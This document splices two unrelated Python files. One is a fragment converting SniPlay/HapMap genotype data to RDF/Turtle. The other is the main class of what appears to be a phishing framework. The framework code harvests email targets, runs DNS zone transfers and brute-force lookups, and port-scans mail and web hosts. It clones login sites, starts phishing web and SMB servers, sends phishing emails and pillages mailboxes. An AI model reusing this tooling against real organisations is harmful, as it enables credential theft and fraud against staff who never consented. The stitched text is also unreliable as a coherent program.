identifiant = sniplay_ds['pos'] + "_" + indiv + "_CC_" + str(allele_incre) + "_MAF_" + sniplay_ds['MAF']
dictionnaireAllele[indiv].append(str(identifiant))
for indiv in sniplay_ds['TT']:
sniplay_buffer += "\t" + base_vocab_ns + "has_allele" + "\t""\t" + sniplay_allele_ns + sniplay_ds['pos'] + "_" + indiv + "_TT_" + str(allele_incre) + " ;\n"
identifiant = sniplay_ds['pos'] + "_" + indiv + "_TT_" + str(allele_incre) + "_MAF_" + sniplay_ds['MAF']
dictionnaireAllele[indiv].append(str(identifiant))
for indiv in sniplay_ds['GG']:
sniplay_buffer += "\t" + base_vocab_ns + "has_allele" + "\t""\t" + sniplay_allele_ns + sniplay_ds['pos'] + "_" + indiv + "_GG_" + str(allele_incre) + " ;\n"
identifiant = sniplay_ds['pos'] + "_" + indiv + "_GG_" + str(allele_incre) + "_MAF_" + sniplay_ds['MAF']
dictionnaireAllele[indiv].append(str(identifiant))
chrom = int(str(re.sub('Chr', '', sniplay_ds['chrom'])))
if chrom < 10:
sniplay_buffer += "\t" + base_vocab_ns + "is_located_on" + "\t" + chromosome_ns + "0" + str(chrom) + " .\n"
else:
sniplay_buffer += "\t" + base_vocab_ns + "is_located_on" + "\t" + chromosome_ns + str(chrom) + " .\n"
increment()
print(sniplay_buffer)
output.write(sniplay_buffer)
def writeIndividu():
    # Emit one RDF/Turtle class declaration per individual from the global
    # dictionnaireAllele mapping, listing every allele identifier collected
    # for that individual, then print and write the whole batch at once.
    parts = []
    for indiv_key, allele_ids in dictionnaireAllele.iteritems():
        parts.append(sniplay_individual_ns + indiv_key + " \n")
        for allele_id in allele_ids:
            # identifiers are "<local>_MAF_<maf>"; only the local part is the URI
            allele_local = allele_id.split('_MAF_')[0]
            parts.append("\t" + base_vocab_ns + "has_allele" + "\t\t" + sniplay_allele_ns + allele_local + " ;\n")
        parts.append("\t" + rdf_ns + "type" + "\t" + owl_ns + "Class" + " ;\n")
        parts.append("\t" + rdfs_ns + "subClassOf" + "\t\t" + co_ns + "CO_715:0000225" + " .\n")
    sniplay_buffer = ''.join(parts)
    print(sniplay_buffer)
    output.write(sniplay_buffer)
def writeAllele():
    # Emit one RDF/Turtle class declaration per allele collected in the
    # global dictionnaireAllele: its MAF (percentage converted to a 0-1
    # float), its homozygous variant code(s), type and superclass.
    parts = []
    for allele_ids in dictionnaireAllele.itervalues():
        for allele_id in allele_ids:
            # identifiers are "<local>_MAF_<maf-percentage>"
            pieces = allele_id.split('_MAF_')
            parts.append(sniplay_allele_ns + pieces[0] + " \n")
            parts.append("\t" + base_vocab_ns + "has_maf" + "\t" + " \"" + str(float(re.sub('%', '', pieces[1])) / 100) + "\"^^xsd:float ;\n")
            tokens = pieces[0].split('_')
            # the local id embeds which homozygous variant(s) were observed
            for code in ('AA', 'CC', 'TT', 'GG'):
                if code in tokens:
                    parts.append("\t" + base_vocab_ns + "variant" + "\t" + "\"" + code + "\" ;\n")
            parts.append("\t" + rdf_ns + "type" + "\t" + owl_ns + "Class" + " ;\n")
            parts.append("\t" + rdfs_ns + "subClassOf" + "\t" + obo_ns + "OBI_0001352" + " . \n")
    sniplay_buffer = ''.join(parts)
    print(sniplay_buffer)
    output.write(sniplay_buffer)
# Save all of the parsed data into a dictionary
def identifiantAllele():
    """Parse the HapMap file at the global ``path`` and append one
    normalized record per data line to the global ``alleleliste``.

    Fields equal to "." are normalized to None; the AA/TT/CC/GG entries
    hold whatever FoundVariant*() extracts for each homozygous variant.
    """
    # use a context manager so the input file is always closed
    # (the previous version leaked the file handle)
    with open(path, "r") as map_reader:
        for line in map_reader:
            # skip the header line
            if line.startswith("rs#"):
                continue
            parts = line.strip().split("\t")
            normalizedInfo = {
                "rs#": None if parts[0] == "." else parts[0],
                "alleles": None if parts[1] == "." else parts[1],
                "chrom": None if parts[2] == "." else parts[2],
                "pos": None if parts[3] == "." else parts[3],
                "gene": None if parts[4] == "." else parts[4],
                "MAF": None if parts[9] == "." else parts[9],
                "AA": FoundVariantAA(line),
                "TT": FoundVariantTT(line),
                "CC": FoundVariantCC(line),
                "GG": FoundVariantGG(line)
            }
            alleleliste.append(normalizedInfo)
def removeAlleleListe():
    """Reset the global allele list to an empty list.

    The previous version assigned the empty *string* '' here, which would
    break the list operations (``append`` in identifiantAllele) performed
    on ``alleleliste`` afterwards.
    """
    global alleleliste
    alleleliste = []
def writePrefix():
    # Write the Turtle @base/@prefix header block for the output document.
    output.write(base + "\t" + "<" + base_uri + "> .\n")
    # (namespace, uri) pairs, emitted in the documented order
    prefix_pairs = (
        (rdf_ns, rdf),
        (rdfs_ns, rdfs),
        (xsd_ns, xsd),
        (owl_ns, owl_uri),
        (base_vocab_ns, base_vocab_uri),
        (obo_ns, obo_uri),
        (chromosome_ns, chromosome_uri),
        (sniplay_pos_ns, sniplay_pos_uri),
        (sniplay_consequence_ns, sniplay_consequence_uri),
        (study_ns, study_uri),
        (sniplay_gene_ns, sniplay_gene_uri),
        (sniplay_gene_integenic_ns, sniplay_gene_integenic_uri),
        (sniplay_individual_ns, sniplay_individual_uri),
        (sniplay_allele_ns, sniplay_allele_uri),
        (co_ns, co_uri),
    )
    for ns, uri in prefix_pairs:
        output.write(pr + "\t" + ns + "<" + uri + "> .\n")
# MAIN #################################################################################################################
def sniplayPaserModel():
    """Top-level driver: parse the SniPlay/HapMap input and write the full
    RDF/Turtle document (prefixes, chromosomes/genes, individuals,
    alleles, study), then report the elapsed wall time.

    NOTE(review): uses the Python 2 print statement and time.clock(), so
    this module requires Python 2.
    """
    avant = time.clock()
    identifiantAllele()
    #print(alleleliste)
    writePrefix()
    # ParseHapMap writes the chromosome and gene declarations
    ParseHapMap()
    writeIndividu()
    writeAllele()
    writeStudy()
    print 'Time execution : ',time.clock() - avant
| |
#!/usr/bin/env python3
#import getopt
import argparse
from . import emails
import sys
import re
import os
import subprocess
import time
import signal
from collections import defaultdict
#import our libs
from .emails import EmailTemplate
from .utils import Utils
from .display import Display
from .gather import Gather
from .mydns import Dns
from .webprofiler import profiler
from .mydb import MyDB
from .sitecloner import SiteCloner
from .mailpillager import MailPillager
from . import portscan
#import our modules
from modules.theharvester import theHarvester
#=================================================
# Primary CLASS
#=================================================
class Framework(object):
def __init__(self):
self.config = {} # dict to contain combined list of config file options and commandline parameters
self.email_list = [] # list of email targets
self.hostname_list = [] # list of dns hosts
self.server_list = {}
self.profile_valid_web_templates = []
self.profile_dynamic_web_templates = []
self.pillaged_users = []
self.bestMailServerPort = None
self.bestMailServer = None
self.webserver = None # web server process
self.webserverpid = None
self.smbserver = None # smb server process
self.smbserverpid = None
self.gather = None
self.mp = None # mail pillager
# initialize some config options
self.config["domain_name"] = ""
self.config["phishing_domain"] = ""
self.config["company_name"] = ""
self.config["config_filename"] = ""
self.config["email_list_filename"] = ""
# default all bool values to False
self.config["verbose"] = False
self.config["gather_emails"] = False
self.config["gather_dns"] = False
self.config["enable_externals"] = False
self.config["enable_web"] = False
self.config["enable_email"] = False
self.config["enable_email_sending"] = False
self.config["simulate_email_sending"] = False
self.config["daemon_web"] = False
self.config["always_yes"] = False
self.config["enable_advanced"] = False
self.config["profile_domain"] = False
self.config["pillage_email"] = False
#self.config["attachment_filename"] = None
#self.config["attachment_fullpath"] = None
# get current IP
#self.config['ip'] = None
# set a few misc values
self.pid_path = os.path.dirname(os.path.realpath(__file__)) + "/../"
self.display = Display()
self.email_templates = defaultdict(list)
#==================================================
# SUPPORT METHODS
#==================================================
#----------------------------
# CTRL-C display and exit
#----------------------------
    def ctrlc(self):
        """Handle Ctrl-C (SIGINT): notify the user, then shut everything
        down via cleanup() — which also exits the process."""
        print()
        self.display.alert("Ctrl-C caught!!!")
        self.cleanup()
#----------------------------
# Close everything down nicely
#----------------------------
def cleanup(self):
print()
if (self.smbserver is not None):
# send SIGTERM to the smb process
self.display.output("Stopping the SMB server")
#self.display.output("stopping the smbserver")
#self.smbserver.send_signal(signal.SIGINT)
# as a double check, manually kill the process
self.killProcess(self.smbserverpid, "spfsmbsrv.pid")
if (self.webserver is not None):
if (self.config["daemon_web"]):
self.display.alert("Webserver is still running as requested.")
else:
# send SIGTERM to the web process
self.display.output("Stopping the web server")
self.webserver.send_signal(signal.SIGINT)
# as a double check, manually kill the process
self.killProcess(self.webserverpid, "spfwebsrv.pid")
# call report generation
self.generateReport()
# exit
sys.exit(0)
#----------------------------
# Kill specified process
#----------------------------
def killProcess(self, pid, filename):
if (os.path.exists("/proc/" + str(pid))):
self.display.alert("Killing process [%s]" % (pid))
os.kill(pid, signal.SIGKILL)
if (os.path.isfile(self.pid_path + filename)):
os.remove(self.pid_path + filename)
#----------------------------
# Generate The simple report
#----------------------------
def generateReport(self):
print()
self.display.output("Generating phishing report")
self.display.log("ENDTIME=%s\n" % (time.strftime("%Y/%m/%d %H:%M:%S")), filename="INFO.txt")
# Start process
cmd = [os.getcwd() + "/report.py", self.outdir]
try:
output = subprocess.check_output(cmd).splitlines()[-1].decode()
#dd, stderr=subprocess.STDOUT, shell=True)
self.display.output("Report file located at %s%s" % (self.outdir + "reports/", str(output)))
except subprocess.CalledProcessError as e:
raise RuntimeError("command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
#----------------------------
# Parse CommandLine Parms
#----------------------------
    def parse_parameters(self, argv):
        """Parse commandline arguments and fold them into self.config.

        Meta flags (--all, --test, --recon, --adv) expand into their
        component options.  --profile and --pillage are switched back off
        (with an error message) unless --dns is enabled too.  If no
        actionable option was supplied, prints usage help and exits.

        :param argv: commandline argument vector
                     (NOTE(review): currently unused — parse_args() reads
                     sys.argv itself; consider passing argv through)
        """
        parser = argparse.ArgumentParser()
        #==================================================
        # Input Files
        #==================================================
        filesgroup = parser.add_argument_group('input files')
        filesgroup.add_argument("-f",
                                metavar="<list.txt>",
                                dest="email_list_file",
                                action='store',
                                help="file containing list of email addresses")
        filesgroup.add_argument("-C",
                                metavar="<config.txt>",
                                dest="config_file",
                                action='store',
                                help="config file")
        #==================================================
        # Enable Flags
        #==================================================
        enablegroup = parser.add_argument_group('enable flags')
        enablegroup.add_argument("--all",
                                 dest="enable_all",
                                 action='store_true',
                                 help="enable ALL flags... same as (-g --external -s -w -v -v -y)")
        enablegroup.add_argument("--test",
                                 dest="enable_test",
                                 action='store_true',
                                 help="enable all flags EXCEPT sending of emails... same as (-g --external --simulate -w -y -v -v)")
        enablegroup.add_argument("--recon",
                                 dest="enable_recon",
                                 action='store_true',
                                 help="gather info (i.e. email addresses, dns hosts, websites, etc...) same as (-e --dns)")
        enablegroup.add_argument("--external",
                                 dest="enable_external",
                                 action='store_true',
                                 help="enable external tool utilization")
        enablegroup.add_argument("--dns",
                                 dest="enable_gather_dns",
                                 action='store_true',
                                 help="enable automated gathering of dns hosts")
        enablegroup.add_argument("-g",
                                 dest="enable_gather_email",
                                 action='store_true',
                                 help="enable automated gathering of email targets")
        enablegroup.add_argument("-s",
                                 dest="enable_send_email",
                                 action='store_true',
                                 help="enable automated sending of phishing emails to targets")
        enablegroup.add_argument("--simulate",
                                 dest="simulate_send_email",
                                 action='store_true',
                                 help="simulate the sending of phishing emails to targets")
        enablegroup.add_argument("-w",
                                 dest="enable_web",
                                 action='store_true',
                                 help="enable generation of phishing web sites")
        enablegroup.add_argument("-W",
                                 dest="daemon_web",
                                 action='store_true',
                                 help="leave web server running after termination of spf.py")
        #==================================================
        # Advanced Flags
        #==================================================
        advgroup = parser.add_argument_group('ADVANCED')
        advgroup.add_argument("--adv",
                              dest="enable_advanced",
                              action='store_true',
                              help="perform all ADVANCED features same as (--dns --profile --pillage)")
        advgroup.add_argument("--profile",
                              dest="profile_domain",
                              action='store_true',
                              help="profile the target domain (requires the --dns flag)")
        advgroup.add_argument("--pillage",
                              dest="pillage_email",
                              action='store_true',
                              help="auto pillage email accounts (requires the --dns flag)")
        #==================================================
        # Optional Args
        #==================================================
        parser.add_argument("-d",
                            metavar="<domain>",
                            dest="domain",
                            action='store',
                            help="domain name to phish")
        parser.add_argument("-p",
                            metavar="<domain>",
                            dest="phishdomain",
                            default="example.com",
                            action='store',
                            help="newly registered 'phish' domain name")
        parser.add_argument("-c",
                            metavar="<company's name>",
                            dest="company",
                            action='store',
                            help="name of company to phish")
        parser.add_argument("--ip",
                            metavar="<IP address>",
                            dest="ip",
                            #default=Utils.getIP(),
                            action='store',
                            help="IP of webserver defaults to [%s]" % (Utils.getIP()))
        parser.add_argument("-v", "--verbosity",
                            dest="verbose",
                            action='count',
                            help="increase output verbosity")
        #==================================================
        # Misc Flags
        #==================================================
        miscgroup = parser.add_argument_group('misc')
        miscgroup.add_argument("-y",
                               dest="always_yes",
                               action='store_true',
                               help="automatically answer yes to all questions")
        # parse args
        args = parser.parse_args()
        # convert parameters to values in the config dict
        self.config["domain_name"] = args.domain
        if (self.config["domain_name"] is None):
            self.config["domain_name"] = ""
        self.config["phishing_domain"] = args.phishdomain
        if (self.config["phishing_domain"] is None):
            self.config["phishing_domain"] = "example.com"
        self.config["company_name"] = args.company
        # only store "ip" when one was given; load_config() fills it in later
        if (args.ip):
            self.config["ip"] = args.ip
        self.config["config_filename"] = args.config_file
        self.config["email_list_filename"] = args.email_list_file
        self.config["verbose"] = args.verbose
        self.config["gather_emails"] = args.enable_gather_email
        self.config["gather_dns"] = args.enable_gather_dns
        self.config["profile_domain"] = args.profile_domain
        self.config["pillage_email"] = args.pillage_email
        self.config["enable_externals"] = args.enable_external
        self.config["enable_web"] = args.enable_web
        self.config["enable_email_sending"] = args.enable_send_email
        self.config["simulate_email_sending"] = args.simulate_send_email
        self.config["daemon_web"] = args.daemon_web
        self.config["always_yes"] = args.always_yes
        # process meta flags
        # recon = gather emails and gather dns
        if (args.enable_recon == True):
            self.config["gather_emails"] = True
            self.config["gather_dns"] = True
        # all = gather emails, enable externals, etc...
        if (args.enable_all == True):
            self.config["gather_emails"] = True
            self.config["enable_externals"] = True
            self.config["enable_web"] = True
            self.config["enable_email_sending"] = True
            self.config["verbose"] = 2
            self.config["always_yes"] = True
        # test = gather emails, enable externals, etc...
        if (args.enable_test == True):
            self.config["gather_emails"] = True
            self.config["enable_externals"] = True
            self.config["simulate_email_sending"] = True
            self.config["enable_web"] = True
            self.config["always_yes"] = True
            self.config["verbose"] = 2
        # advanced = dns, profile, and pillage
        if (args.enable_advanced == True):
            self.config["gather_dns"] = True
            self.config["profile_domain"] = True
            self.config["pillage_email"] = True
        # profile requires dns
        if (self.config["profile_domain"] and not self.config["gather_dns"]):
            self.config["profile_domain"] = False
            self.display.error("--profile requires the --dns option to be enabled as well.")
        # pillage requires dns
        if (self.config["pillage_email"] and not self.config["gather_dns"]):
            self.config["pillage_email"] = False
            self.display.error("--pillage requires the --dns option to be enabled as well.")
        # see if we are good to go
        good = False
        if (self.config["email_list_filename"]
            or self.config["gather_emails"]
            or self.config["enable_externals"]
            or self.config["enable_web"]
            or self.config["enable_email_sending"]
            or self.config["simulate_email_sending"]
            or self.config["gather_dns"]
            or self.config["profile_domain"]
            or self.config["pillage_email"]):
            good = True
        if (not good):
            self.display.error("Please enable at least one of the following parameters: -g --external --dns -s --simulate -w ( --all --test --recon --adv )")
            print()
            parser.print_help()
            sys.exit(1)
#----------------------------
# Process/Load config file
#----------------------------
def load_config(self):
# does config file exist?
if (self.config["config_filename"] is not None):
temp1 = self.config
temp2 = Utils.load_config(self.config["config_filename"])
self.config = dict(list(temp2.items()) + list(temp1.items()))
else:
# guess not.. so try to load the default one
if Utils.is_readable("misc/default.cfg"):
self.display.error("a CONFIG FILE was not specified... defaulting to [misc/default.cfg]")
print()
temp1 = self.config
temp2 = Utils.load_config("misc/default.cfg")
self.config = dict(list(temp2.items()) + list(temp1.items()))
else:
# someone must have removed it!
self.display.error("a CONFIG FILE was not specified...")
print()
sys.exit(1)
# set verbosity/debug level
if (self.config.get("verbose")):
if (self.config['verbose'] >= 1):
self.display.enableVerbose()
if (self.config.get("verbose")):
if (self.config['verbose'] > 1):
self.display.enableDebug()
if (self.config["ip"] == "0.0.0.0") or (self.config["ip"] is None):
self.config["ip"]=Utils.getIP()
# set logging path
self.outdir = os.getcwd() + "/" + self.config["domain_name"] + "_" + self.config["phishing_domain"] + "/"
if not os.path.exists(os.path.dirname(self.outdir)):
os.makedirs(os.path.dirname(self.outdir))
self.display.setLogPath(self.outdir + "logs/")
# create sqllite db
self.db = MyDB(sqlite_file=self.outdir)
# log it
self.display.log("STARTTIME=%s\n" % (time.strftime("%Y/%m/%d %H:%M:%S")), filename="INFO.txt")
self.display.log("TARGETDOMAIN=%s\n" % (self.config["domain_name"]), filename="INFO.txt")
self.display.log("PHISHINGDOMAIN=%s\n" % (self.config["phishing_domain"]), filename="INFO.txt")
#----------------------------
# Load/Gather target email addresses
#----------------------------
def prep_email(self):
# are required flags set?
if ((self.config["email_list_filename"] is not None) or (self.config["gather_emails"] == True)):
print()
self.display.output("Obtaining list of email targets")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
# if an external email list file was specified, read it in
if self.config["email_list_filename"] is not None:
file = open(self.config["email_list_filename"], 'r')
temp_list = file.read().splitlines()
self.display.verbose("Loaded [%s] email addresses from [%s]" % (len(temp_list), self.config["email_list_filename"]))
self.email_list += temp_list
# gather email addresses
if self.config["gather_emails"] == True:
if (self.config["domain_name"] == ""):
self.display.error("No target domain specified. Can not gather email addresses.")
else:
self.display.verbose("Gathering emails via built-in methods")
self.display.verbose(Gather.get_sources())
if (not self.gather):
self.gather = Gather(self.config["domain_name"], display=self.display)
temp_list = self.gather.emails()
self.display.verbose("Gathered [%s] email addresses from the Internet" % (len(temp_list)))
self.email_list += temp_list
print()
# gather email addresses from external sources
if (self.config["gather_emails"] == True) and (self.config["enable_externals"] == True):
# theHarvester
self.display.verbose("Gathering emails via theHarvester")
thr = theHarvester(self.config["domain_name"], self.config["theharvester_path"], display=self.display)
out = thr.run()
if (not out):
temp_list = thr.emails()
self.display.verbose("Gathered [%s] email addresses from theHarvester" % (len(temp_list)))
self.email_list += temp_list
else:
self.display.error(out)
print()
# # Recon-NG
# self.display.verbose("Gathering emails via Recon-NG")
# temp_list = reconng(self.config["domain_name"], self.config["reconng_path"]).gather()
# self.display.verbose("Gathered [%s] email addresses from Recon-NG" % (len(temp_list)))
# self.email_list += temp_list
# sort/unique email list
self.email_list = Utils.unique_list(self.email_list)
self.email_list.sort()
# add each user to the sqllite db
self.db.addUsers(self.email_list)
# print list of email addresses
self.display.verbose("Collected [%s] unique email addresses" % (len(self.email_list)))
self.display.print_list("EMAIL LIST",self.email_list)
for email in self.email_list:
self.display.log(email + "\n", filename="email_targets.txt")
#----------------------------
# Gather dns hosts
#----------------------------
def gather_dns(self):
# are required flags set?
if (self.config["gather_dns"] == True):
print()
self.display.output("Obtaining list of host on the %s domain" % (self.config["domain_name"]))
self.display.verbose("Gathering hosts via built-in methods")
# Gather hosts from internet search
self.display.verbose(Gather.get_sources())
if (not self.gather):
self.gather = Gather(self.config["domain_name"], display=self.display)
temp_list = self.gather.hosts()
self.display.verbose("Gathered [%s] hosts from the Internet Search" % (len(temp_list)))
self.hostname_list += temp_list
# Gather hosts from DNS lookups
temp_list = Dns.xfr(self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS Zone Transfer" % (len(temp_list)))
self.hostname_list += temp_list
temp_list = Dns.ns(self.config["domain_name"])
temp_list = Utils.filterList(temp_list, self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS NS lookups" % (len(temp_list)))
self.hostname_list += temp_list
temp_list = Dns.mx(self.config["domain_name"])
temp_list = Utils.filterList(temp_list, self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS MX lookups" % (len(temp_list)))
self.hostname_list += temp_list
# Gather hosts from dictionary lookup
try:
temp_list = Dns.brute(self.config["domain_name"], display=self.display)
except:
pass
self.display.verbose("Gathered [%s] hosts from DNS BruteForce/Dictionay Lookup" % (len(temp_list)))
self.hostname_list += temp_list
# sort/unique hostname list
self.hostname_list = Utils.unique_list(self.hostname_list)
self.hostname_list.sort()
# add list of identified hosts to sqllite db
self.db.addHosts(self.hostname_list)
# print list of hostnames
self.display.verbose("Collected [%s] unique host names" % (len(self.hostname_list)))
self.display.print_list("HOST LIST", self.hostname_list)
#----------------------------
# Perform Port Scans
#----------------------------
def port_scan(self):
# are required flags set?
if (self.config["gather_dns"] == True):
self.display.output("Performing basic port scans of any identified hosts.")
# define list of ports to scan for
ports = [25, 80,110, 143, 443, 993, 995]
# prep array of arrays
for port in ports:
self.server_list[port] = []
# for each host in the host list
for host in self.hostname_list:
# run port scan
openports = portscan.scan(host, ports)
found = False
# for any open ports, add it to the associated list
for port in openports:
self.db.addPort(port, host)
if (port == 80):
self.display.verbose("Found website at: %s 80" % (host))
self.server_list[80].append(host)
found = True
elif (port == 443):
self.display.verbose("Found website at: %s 443" % (host))
self.server_list[443].append(host)
found = True
elif (port == 110):
self.display.verbose("Found POP at : %s 110" % (host))
self.server_list[110].append(host)
found = True
elif (port == 995):
self.display.verbose("Found POPS at : %s 995" % (host))
self.server_list[995].append(host)
found = True
elif (port == 143):
self.display.verbose("Found IMAP at : %s 143" % (host))
self.server_list[143].append(host)
found = True
elif (port == 993):
self.display.verbose("Found IMAPS at : %s 993" % (host))
self.server_list[993].append(host)
found = True
elif (port == 25):
self.display.verbose("Found SMTP at : %s 25" % (host))
self.server_list[25].append(host)
found = True
if (found):
self.display.log(host + "\n", filename="hosts.txt")
#----------------------------
# Profile Web Sites
#----------------------------
    def profile_site(self):
        """Profile every discovered web server (ports 80/443), match each
        against the known templates, and queue dynamic login sites for
        cloning.

        Results accumulate in self.profile_valid_web_templates /
        self.profile_dynamic_web_templates and the web-template db.
        """
        # are required flags set?
        if (self.config["profile_domain"] == True):
            self.display.output("Determining if any of the identified hosts have web servers.")
            # for hosts in the port 80 list
            for host in self.server_list[80]:
                # create a profiler object
                p = profiler()
                # run it against the website
                profile_results = p.run("http://" + host, debug=False)
                # if we got valid results, look to see if we have a match for one of the templates
                if (profile_results and (len(profile_results) > 0)):
                    # pick the template with the highest score
                    # NOTE(review): unpacking profile_results as (key, value)
                    # pairs assumes profiler.run() returns an iterable of
                    # 2-tuples — confirm against webprofiler.profiler
                    max_key = ""
                    max_value = 0
                    for key, value in profile_results:
                        if (value.getscore() > max_value):
                            max_key = key
                            max_value = value.getscore()
                    if (max_value > 0):
                        self.display.verbose("POSSIBLE MATCH FOR [http://%s] => [%s]" % (host, max_key))
                        self.profile_valid_web_templates.append(max_key)
                else:
                    # other wise we will see about adding it to a list of sites to clone
                    if (p.hasLogin("http://" + host)):
                        # NOTE(review): unlike the https branch below, no
                        # "POSSIBLE DYNAMIC TEMPLATE SITE" message is logged
                        # here — looks like an oversight; confirm
                        self.profile_dynamic_web_templates.append("http://" + host)
            # repeat same as for port 80
            for host in self.server_list[443]:
                p = profiler()
                profile_results = p.run("https://" + host, debug=False)
                if (profile_results and (len(profile_results) > 0)):
                    max_key = ""
                    max_value = 0
                    for key, value in profile_results:
                        if (value.getscore() > max_value):
                            max_key = key
                            max_value = value.getscore()
                    if (max_value > 0):
                        self.display.verbose("POSSIBLE MATCH FOR [https://%s] => [%s]" % (host, max_key))
                        self.profile_valid_web_templates.append(max_key)
                else:
                    if (p.hasLogin("https://" + host)):
                        self.display.verbose("POSSIBLE DYNAMIC TEMPLATE SITE [https://%s]" % (host))
                        self.profile_dynamic_web_templates.append("https://" + host)
            # sort/unique list of valid templates
            self.profile_valid_web_templates = Utils.unique_list(self.profile_valid_web_templates)
            self.profile_valid_web_templates.sort()
            # print list of valid templates
            self.display.verbose("Collected [%s] valid web templates" % (len(self.profile_valid_web_templates)))
            self.display.print_list("VALID TEMPLATE LIST",self.profile_valid_web_templates)
            # sort/unique list of dynamic templates
            self.profile_dynamic_web_templates = Utils.unique_list(self.profile_dynamic_web_templates)
            self.profile_dynamic_web_templates.sort()
            # print list of dynamic templates
            self.display.verbose("Collected [%s] dynamic web templates" % (len(self.profile_dynamic_web_templates)))
            self.display.print_list("DYNAMIC TEMPLATE LIST",self.profile_dynamic_web_templates)
            # lowercase + sort/unique the dynamic template list
            self.profile_dynamic_web_templates = Utils.lowercase_list(self.profile_dynamic_web_templates)
            self.profile_dynamic_web_templates = Utils.unique_list(self.profile_dynamic_web_templates)
            self.profile_dynamic_web_templates.sort()
            # for any dynamic sites, try to clone them
            self.display.output("Cloning any DYNAMIC sites")
            for template in self.profile_dynamic_web_templates:
                sc = SiteCloner(clone_dir=self.outdir+"web_clones/")
                tdir = sc.cloneUrl(template)
                self.display.verbose("Cloning [%s] to [%s]" % (template, tdir))
                self.db.addWebTemplate(ttype="dynamic", src_url=template, tdir=tdir)
            # loop over all built in templates, registering any whose CONFIG
            # VHOST matches one of the profiled template names
            # NOTE(review): open() here leaks the file handle, and `tem` is
            # interpolated unescaped into the regex — confirm template names
            # never contain regex metacharacters
            for f in os.listdir(self.config["web_template_path"]):
                template_file = os.path.join(self.config["web_template_path"], f) + "/CONFIG"
                for line in open(template_file).readlines():
                    for tem in self.profile_valid_web_templates:
                        if re.match("^VHOST=\s*"+tem+"\s*$", line, re.IGNORECASE):
                            self.db.addWebTemplate(ttype="static", src_url="", tdir=os.path.join(self.config["web_template_path"], f))
                            break
#----------------------------
# Select Web Templates
#----------------------------
def select_web_templates(self):
templates = []
# get lists of current templates
db_static_templates = self.db.getWebTemplates(ttype="static")
db_dynamic_templates = self.db.getWebTemplates(ttype="dynamic")
# check to see if we have templates
if (db_static_templates or db_dynamic_templates):
for template in db_static_templates:
parts = template.split("[-]")
template_file = parts[0] + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("static", parts[0], parts[1]))
for template in db_dynamic_templates:
parts = template.split("[-]")
template_file = parts[0] + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("dynamic", parts[0], parts[1]))
else:
# assume we do not have any valid templates
# load all standard templates
for f in os.listdir(self.config["web_template_path"]):
template_file = os.path.join(self.config["web_template_path"], f) + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("static", os.path.join(self.config["web_template_path"], f), ""))
print("FIXED = [%s]" % (os.path.join(self.config["web_template_path"], f)))
# if "always yes" is enabled then just use all templates
if (not self.config["always_yes"]):
items = self.display.selectlist("Please select (comma seperated) the item(s) you wish to use. (prese ENTER to use all): ", templates)
size_of_templates = len(templates)
if items and (len(items) > 0):
templates_temp = []
self.db.clearWebTemplates()
for item in items:
if (int(item) > 0) and (int(item) <= size_of_templates):
self.display.verbose("Enabled Template: " + str(templates[int(item)-1]))
templates_temp.append(templates[int(item)-1])
self.db.addWebTemplate(ttype=templates[int(item)-1][0], src_url=templates[int(item)-1][2], tdir=templates[int(item)-1][1])
else:
self.display.alert("Invalid select of [" + item + "] was ignored")
templates = templates_temp
# print list of enabled templates
self.display.print_list("TEMPLATE LIST", templates)
#----------------------------
# Start SMB Server
#----------------------------
def start_smbserver(self):
if self.config["enable_smb_server"] == "1":
print()
self.display.output("Starting SMB Server")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
path = os.path.dirname(os.path.realpath(__file__))
# Start process
cmd = [path + "/../smbsrv.py"]
#self.smbserver = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE)
self.smbserver = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE)
# Write PID file
pidfilename = os.path.join(self.pid_path, "spfsmbsrv.pid")
pidfile = open(pidfilename, 'w')
pidfile.write(str(self.smbserver.pid))
pidfile.close()
self.smbserverpid = self.smbserver.pid
self.display.verbose("Started SMBServer with pid = [%s]" % self.smbserver.pid)
return
#----------------------------
# Load web sites
#----------------------------
    def load_websites(self):
        """Start the phishing web server child process and harvest its output.

        Spawns web.py with the compressed config, then reads its stdout until
        the "Websites loaded and launched." sentinel.  Each "Started website"
        line is parsed for VHOST and PORT, which are stored back into
        self.config, and a screenshot of each launched site is captured.
        Finally the child's PID is written to spfwebsrv.pid.
        """
        # Is the required flag set?
        if self.config["enable_web"] == True:
            self.select_web_templates()
            print()
            self.display.output("Starting phishing webserver")
            if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
                path = os.path.dirname(os.path.realpath(__file__))
                # Start the web server child process.
                cmd = [path + "/../web.py", Utils.compressDict(self.config)]
                self.webserver = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE)
                # Monitor child stdout to gather website information until the
                # sentinel line signals that all sites are up.
                while True:
                    line = self.webserver.stdout.readline()
                    line = line.decode()
                    line = line.strip()
                    if line == 'Websites loaded and launched.':
                        break
                    if line != '':
                        self.display.verbose(line)
                        match=re.search("Started website", line)
                        VHOST = ""
                        PORT = ""
                        if match:
                            # Lines look like "... [<vhost>] ... [<...port info>]";
                            # VHOST is in the first bracket pair, PORT in the second.
                            parts=line.split("[")
                            VHOST=parts[1].split("]")
                            VHOST=VHOST[0].strip()
                            PORT=parts[2].split("]")
                            PORT=PORT[0].strip()
                            # NOTE(review): the [7:] slice presumably strips a fixed
                            # prefix emitted by web.py — confirm against its output format.
                            PORT=PORT[7:]
                            # keep the URL clean
                            # if port is 80, then it does not need to be included in the URL
                            if (PORT[-3:] == ":80"):
                                PORT = PORT[:-3]
                            #PORT = str(PORT)
                            #VHOST = str(VHOST)
                            # NOTE(review): keys are stored as bytes here
                            # (VHOST.encode() + b"_port") but other code builds them as
                            # (TYPE + "_port").encode() — mismatch-prone; confirm intent.
                            self.config[VHOST.encode() + b"_port"] = PORT
                            self.config[VHOST.encode() + b"_vhost"] = VHOST
                            Utils.screenCaptureWebSite("http://" + str(PORT),
                                self.outdir + "screenshots/" + str(PORT) + "_" + str(VHOST) + ".png")
